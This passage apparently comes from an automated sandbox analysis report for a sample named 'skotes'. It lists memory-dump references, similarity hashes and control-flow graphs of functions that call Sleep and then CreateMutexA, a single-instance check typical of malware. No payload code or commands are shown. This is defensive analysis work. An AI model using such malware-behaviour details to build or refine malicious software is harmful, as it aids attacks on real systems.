                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 740f878dcd2d41d2f890b29ea45b167035232a2b02ec08863ce99c8955122d2f
                                                          • Instruction ID: b07100a668bf240cc25c1cf8abedfd687b6dc725b6b1de2a73624b2c8aa32962
                                                          • Opcode Fuzzy Hash: 740f878dcd2d41d2f890b29ea45b167035232a2b02ec08863ce99c8955122d2f
                                                          • Instruction Fuzzy Hash: 19317B316042849BEB18EB7DDC8976DBBE6EFC6310F304298E414D73D6C775A9848752

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 22 be9f44-be9f64 26 be9f66-be9f72 22->26 27 be9f92-be9fae 22->27 28 be9f88-be9f8f call bfd663 26->28 29 be9f74-be9f82 26->29 30 be9fdc-be9ffb 27->30 31 be9fb0-be9fbc 27->31 28->27 29->28 32 bea92b 29->32 36 be9ffd-bea009 30->36 37 bea029-bea916 call bf80c0 30->37 34 be9fbe-be9fcc 31->34 35 be9fd2-be9fd9 call bfd663 31->35 39 bea953-bea994 Sleep CreateMutexA 32->39 40 bea92b call c16c6a 32->40 34->32 34->35 35->30 43 bea01f-bea026 call bfd663 36->43 44 bea00b-bea019 36->44 52 bea996-bea998 39->52 53 bea9a7-bea9a8 39->53 40->39 43->37 44->32 44->43 52->53 54 bea99a-bea9a5 52->54 54->53
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: d228f58b5bcc1dce609b7d9369146821ae29ae2b9d76f41c8e9d15e19e061a6e
                                                          • Instruction ID: be2f5bea7866677d8ed42e32d0f2ba1a3e13ed2aeaa9a7c3a60fd7c393d24e3b
                                                          • Opcode Fuzzy Hash: d228f58b5bcc1dce609b7d9369146821ae29ae2b9d76f41c8e9d15e19e061a6e
                                                          • Instruction Fuzzy Hash: 7C317B317001849BEB189B7DDC987ACB7E6EFC6310F204698E414DB3D6C775B9848762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 56 bea079-bea099 60 bea09b-bea0a7 56->60 61 bea0c7-bea0e3 56->61 64 bea0bd-bea0c4 call bfd663 60->64 65 bea0a9-bea0b7 60->65 62 bea0e5-bea0f1 61->62 63 bea111-bea130 61->63 67 bea107-bea10e call bfd663 62->67 68 bea0f3-bea101 62->68 69 bea15e-bea916 call bf80c0 63->69 70 bea132-bea13e 63->70 64->61 65->64 71 bea930-bea994 call c16c6a Sleep CreateMutexA 65->71 67->63 68->67 68->71 75 bea154-bea15b call bfd663 70->75 76 bea140-bea14e 70->76 86 bea996-bea998 71->86 87 bea9a7-bea9a8 71->87 75->69 76->71 76->75 86->87 88 bea99a-bea9a5 86->88 88->87
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: cc0020c37f36982f1d5530581cd3fb771b45d006d811abd87ee54350d97bfb57
                                                          • Instruction ID: ad951c1112ad6e8d0a70b229d1fab8a676239faa8427e75c2cea6ef912d7f752
                                                          • Opcode Fuzzy Hash: cc0020c37f36982f1d5530581cd3fb771b45d006d811abd87ee54350d97bfb57
                                                          • Instruction Fuzzy Hash: 943137316002809BEB189B79CC89BACB7A6EBC6310F204698E414E73D6C775B9848613

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 90 bea1ae-bea1ce 94 bea1fc-bea218 90->94 95 bea1d0-bea1dc 90->95 98 bea21a-bea226 94->98 99 bea246-bea265 94->99 96 bea1de-bea1ec 95->96 97 bea1f2-bea1f9 call bfd663 95->97 96->97 102 bea935 96->102 97->94 104 bea23c-bea243 call bfd663 98->104 105 bea228-bea236 98->105 100 bea267-bea273 99->100 101 bea293-bea916 call bf80c0 99->101 106 bea289-bea290 call bfd663 100->106 107 bea275-bea283 100->107 110 bea953-bea994 Sleep CreateMutexA 102->110 111 bea935 call c16c6a 102->111 104->99 105->102 105->104 106->101 107->102 107->106 120 bea996-bea998 110->120 121 bea9a7-bea9a8 110->121 111->110 120->121 122 bea99a-bea9a5 120->122 122->121
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: ca15fc10bdc568162d628143196cd56b6af1f28f47565e961c5f518f9ccce134
                                                          • Instruction ID: 0803cd89f4a03b6a3fca6573dbb69e6ff9bc8aaade86a918a8aca459e9d4f805
                                                          • Opcode Fuzzy Hash: ca15fc10bdc568162d628143196cd56b6af1f28f47565e961c5f518f9ccce134
                                                          • Instruction Fuzzy Hash: DE314831A001809BEB089B7DDC89B6CB7EAEFC7310F204698E514E72D6D775A9848613

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 124 bea418-bea438 128 bea43a-bea446 124->128 129 bea466-bea482 124->129 130 bea45c-bea463 call bfd663 128->130 131 bea448-bea456 128->131 132 bea484-bea490 129->132 133 bea4b0-bea4cf 129->133 130->129 131->130 136 bea93f-bea949 call c16c6a * 2 131->136 138 bea4a6-bea4ad call bfd663 132->138 139 bea492-bea4a0 132->139 134 bea4fd-bea916 call bf80c0 133->134 135 bea4d1-bea4dd 133->135 140 bea4df-bea4ed 135->140 141 bea4f3-bea4fa call bfd663 135->141 155 bea94e 136->155 156 bea949 call c16c6a 136->156 138->133 139->136 139->138 140->136 140->141 141->134 157 bea953-bea994 Sleep CreateMutexA 155->157 158 bea94e call c16c6a 155->158 156->155 160 bea996-bea998 157->160 161 bea9a7-bea9a8 157->161 158->157 160->161 162 bea99a-bea9a5 160->162 162->161
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
